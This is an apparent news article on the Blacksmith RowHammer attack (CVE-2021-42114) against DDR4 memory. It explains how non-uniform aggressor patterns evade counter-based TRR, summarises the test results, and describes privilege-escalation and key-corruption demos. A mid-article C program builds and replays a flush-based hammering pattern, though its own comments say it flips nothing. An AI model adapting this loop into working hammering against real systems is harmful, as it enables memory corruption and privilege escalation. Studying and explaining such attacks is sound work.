A group of researchers from ETH Zurich (the Swiss Federal Institute of Technology), the Vrije Universiteit Amsterdam and Qualcomm has published a new RowHammer attack method that alters the contents of individual bits in dynamic random access memory (DRAM).
The attack, named Blacksmith and tracked as CVE-2021-42114, affects many DDR4 chips that are protected against the previously known RowHammer methods but succumb to this new variant.
For those unfamiliar with RowHammer: it is an attack that corrupts individual memory bits by repeatedly activating (opening) neighbouring rows of memory cells. DRAM is a two-dimensional array of cells, each consisting of a capacitor and a transistor; hammering the same area of memory over and over causes voltage fluctuations and disturbances that leak a small amount of charge from adjacent cells. If the hammering is intense enough, a neighbouring cell can lose so much charge that the next refresh cycle does not arrive in time to restore its original state, and the value stored in the cell flips.
To defend against RowHammer, chip makers introduced a mechanism called TRR (Target Row Refresh), which protects the cells in rows adjacent to a heavily activated row. Because that protection relied on security by obscurity, it did not address the root cause but only the known special cases, which made the search for bypasses easier. In May, for example, Google presented the Half-Double method, which TRR did not stop because the corrupted cells lie two rows away from the hammered ones rather than directly adjacent to them.
Blacksmith offers a different way around TRR: non-uniform access patterns in which two or more aggressor rows are hammered at different frequencies, phases and amplitudes, so that their combined disturbance still leaks charge from the victim row.
To find the access pattern that causes the leakage, the researchers built a special fuzzer that automatically chooses the attack parameters for a given chip by varying the order, intensity and timing of the accesses.
Because the approach does not rely on hammering the same rows over and over, it defeats current TRR implementations, which in one way or another come down to counting repeated activations of a row and, once a certain count is reached, refreshing its neighbours. With Blacksmith the accesses are spread across several rows on both sides of the target, so charge leaks from the victim without any single aggressor reaching the threshold.
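As an added illustration of the two ideas above (the access loop behind RowHammer and the non-uniform pattern Blacksmith uses to stay under a counter-based TRR), the following C program is not the researchers' code or their fuzzer. It expands per-aggressor frequency, phase and amplitude into a concrete activation sequence, counts how often each row is activated (the quantity a counting TRR watches), and replays the sequence with a cache-line flush after every access so that each one reaches DRAM instead of the cache. The row numbers, pattern length and TRR threshold are assumptions chosen for the demo, and the "rows" it hammers are ordinary heap pages, not physically adjacent DRAM rows (mapping those requires the platform's DRAM address function), so it flips nothing; it shows the structure of the access sequence, not a working exploit.

```c
/* Added demo, not the Blacksmith authors' code. All parameters are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#if defined(__SSE2__)
#include <immintrin.h>
#define FLUSH_LINE(p) _mm_clflush((const void *)(p))
#else
#define FLUSH_LINE(p) ((void)(p)) /* no portable user-space flush: demo only */
#endif

/* One aggressor as Blacksmith parameterises it: which row, how often it
 * reappears in the pattern (period, in activation slots), where its first
 * appearance starts (phase) and how many back-to-back activations each
 * appearance consists of (amplitude). */
typedef struct {
    int row;
    int period;
    int phase;
    int amplitude;
} aggressor;

#define FILLER_ROW (-1) /* slot not claimed by any aggressor: hit a distant row */

/* Expand the aggressor descriptions into a sequence of 'len' activation
 * slots. Earlier aggressors win collisions. Returns the number of slots
 * claimed by an aggressor; the rest are filler. */
int build_pattern(const aggressor *aggs, int naggs, int len, int *out)
{
    int claimed = 0;
    for (int t = 0; t < len; t++) {
        out[t] = FILLER_ROW;
        for (int i = 0; i < naggs; i++) {
            const aggressor *a = &aggs[i];
            if (t < a->phase)
                continue;
            if ((t - a->phase) % a->period < a->amplitude) {
                out[t] = a->row;
                claimed++;
                break;
            }
        }
    }
    return claimed;
}

/* Number of activations of 'row' in one pass over the pattern: what a
 * counter-based TRR compares against its threshold. */
int row_activations(const int *pattern, int len, int row)
{
    int n = 0;
    for (int t = 0; t < len; t++)
        n += (pattern[t] == row);
    return n;
}

/* Replay the pattern 'rounds' times. rows[i] is an address inside row i and
 * 'filler' an address in a far-away row. Every read is followed by a flush so
 * the next read of the same line goes to DRAM again. Returns the number of
 * memory accesses performed. */
long replay(const int *pattern, int len, volatile uint8_t **rows,
            volatile uint8_t *filler, int rounds)
{
    long accesses = 0;
    unsigned sink = 0;
    for (int r = 0; r < rounds; r++) {
        for (int t = 0; t < len; t++) {
            volatile uint8_t *p = pattern[t] == FILLER_ROW ? filler : rows[pattern[t]];
            sink += *p;      /* the activation */
            FLUSH_LINE(p);   /* evict so the next access is not served from cache */
            accesses++;
        }
    }
    (void)sink;
    return accesses;
}

int main(void)
{
    enum { LEN = 64, NROWS = 4, TRR_THRESHOLD = 32, PAGE = 4096 };
    /* Assumed pattern: pair A (rows 0,1) every 8 slots in bursts of 2,
     * pair B (rows 2,3) every 16 slots in bursts of 3. */
    aggressor aggs[] = {
        { 0,  8,  0, 2 }, { 1,  8,  2, 2 },
        { 2, 16,  4, 3 }, { 3, 16, 12, 3 },
    };
    int pattern[LEN];
    int claimed = build_pattern(aggs, NROWS, LEN, pattern);
    printf("%d of %d slots claimed by aggressors, %d filler\n", claimed, LEN, LEN - claimed);
    for (int r = 0; r < NROWS; r++) {
        int n = row_activations(pattern, LEN, r);
        printf("row %d: %d activations (%s assumed TRR threshold %d)\n", r, n,
               n < TRR_THRESHOLD ? "below" : "at/above", TRR_THRESHOLD);
    }

    /* Demo memory: one heap page per "row" plus a filler page. These are not
     * adjacent DRAM rows, so nothing will flip. */
    uint8_t *mem = malloc((NROWS + 1) * PAGE);
    if (!mem)
        return 1;
    volatile uint8_t *rows[NROWS];
    for (int r = 0; r < NROWS; r++)
        rows[r] = mem + r * PAGE;
    long n = replay(pattern, LEN, rows, mem + NROWS * PAGE, 1000);
    printf("replayed %ld accesses\n", n);
    free(mem);
    return 0;
}
```

The point of the per-row counts is the one the article makes: in the assumed pattern the four aggressors together claim 56 of 64 slots, yet no single row is activated more than 16 times per pass, so a TRR that only refreshes neighbours of a row once that row crosses its counter would never trigger, while the victim keeps being disturbed from both sides.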
The method proved far more effective at bypassing TRR than earlier techniques: the researchers achieved bit flips on all 40 of the recently purchased DDR4 memory modules they tested, from Samsung, Micron, SK Hynix and an unspecified manufacturer (the vendor was not marked on 4 of the modules). By comparison, TRRespass, proposed earlier by the same group, worked against only 13 of the 42 modules tested at the time.
Broadly, Blacksmith is considered applicable to about 94% of the DRAM chips on the market, although the researchers note that some chips are more vulnerable and easier to attack than others. Error-correcting codes (ECC) and doubling the refresh rate do not provide complete protection, but they do make exploitation harder.
Notably, the problem cannot be fixed in chips that have already shipped and requires new protection at the hardware level, so the attack will remain relevant for many years.
As practical demonstrations, the researchers used Blacksmith to modify page table entries (PTEs) to gain kernel privileges, to corrupt an RSA-2048 public key held in memory by OpenSSH (the public key in a neighbouring virtual machine can be flipped until it matches a private key the attacker holds, allowing a login to the victim VM) and to bypass the authorization check in the sudo process by modifying its memory to obtain root. Depending on the chip, flipping the target bit takes anywhere from 3 seconds to several hours.
Finally, if you are interested in learning more, you can check the details at the following link.